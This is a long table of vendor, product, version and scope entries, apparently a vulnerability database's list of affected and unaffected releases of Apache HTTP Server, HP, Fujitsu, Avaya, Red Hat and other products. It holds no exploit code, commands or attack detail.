vendor: | apache | model: | apache | scope: | eq | version: | 2.2.15 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.14 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.13 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.12 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.10 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.9 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.8 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.6 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.5 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.63 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.61 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.60 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.57 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.45 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.44 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.43 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.41 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.40 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.39 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.38 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.37 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.36 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.35 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.21 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.20 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.19 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.18 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.17 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.16 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.64 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | ne | version: | 3.8.1.1 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | ne | version: | 3.7.9.1 | Trust: 0.3 |
vendor: | juniper | model: | nsm appliance generic offline for centos | scope: | ne | version: | 51 | Trust: 0.3 |
vendor: | juniper | model: | junos space 13.1r1.6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | ne | version: | v70001.40 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | ne | version: | v70001.3.23 | Trust: 0.3 |
vendor: | hp | model: | xp provisioning manager | scope: | ne | version: | 7.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | ne | version: | 7.1.1 | Trust: 0.3 |
vendor: | hp | model: | p9000 tiered storage manager | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication manager | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | ne | version: | 3.56 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | ne | version: | x10.8.2 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | ne | version: | x10.7.5 | Trust: 0.3 |
vendor: | apache | model: | 2.2.22-dev | scope: | ne | version: | - | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 2.0.65 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux ws | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux es | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop version | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | red | model: | hat jboss enterprise web server for rhel | scope: | eq | version: | 61.0 | Trust: 0.3 |
vendor: | red | model: | hat jboss enterprise web server for rhel server | scope: | eq | version: | 51.0 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux as | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | oracle | model: | application server 10g r3 | scope: | eq | version: | 10.1.3.5.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | ibm | model: | os/400 v6r1m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/400 v5r5m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/400 v5r4m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.11 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.5 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.19 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.17 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.15 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.13 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2.27 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.96 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.2.77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.1.73 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.68 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.64 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2.0-12 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0.103 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0.102 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0-103 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.0.95 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.0-95 | Trust: 0.3 |
vendor: | hp | model: | system management homepage b | scope: | eq | version: | 3.0.2.77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.2-77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.1-73 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.0-68 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hp | model: | openvms secure web server | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10a | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition b | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition b | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.3 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition 9.1.0b | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.1.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l11 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l11 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10c | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10b | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10a | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition b | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition b | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.3 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.1.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 9.1.0b | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 9.1.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l11 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 6.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10c | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10b | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | voice portal sp2 | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.0.0.52 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp2 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp2 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.3 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.2 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.3 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.2 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.0.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.6 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.5 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.4 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.3 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.15 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.13 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.12 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.10 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.63 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.61 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.60 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.57 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.45 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.44 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.43 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.41 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.40 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.39 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.38 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.37 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.36 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.35 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.34 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache beta | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache a9 | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.68 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.65 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.42 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.41 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.39 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.38 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.37 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.36 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 1.3.35 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.34 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.33 | Trust: 0.3 |
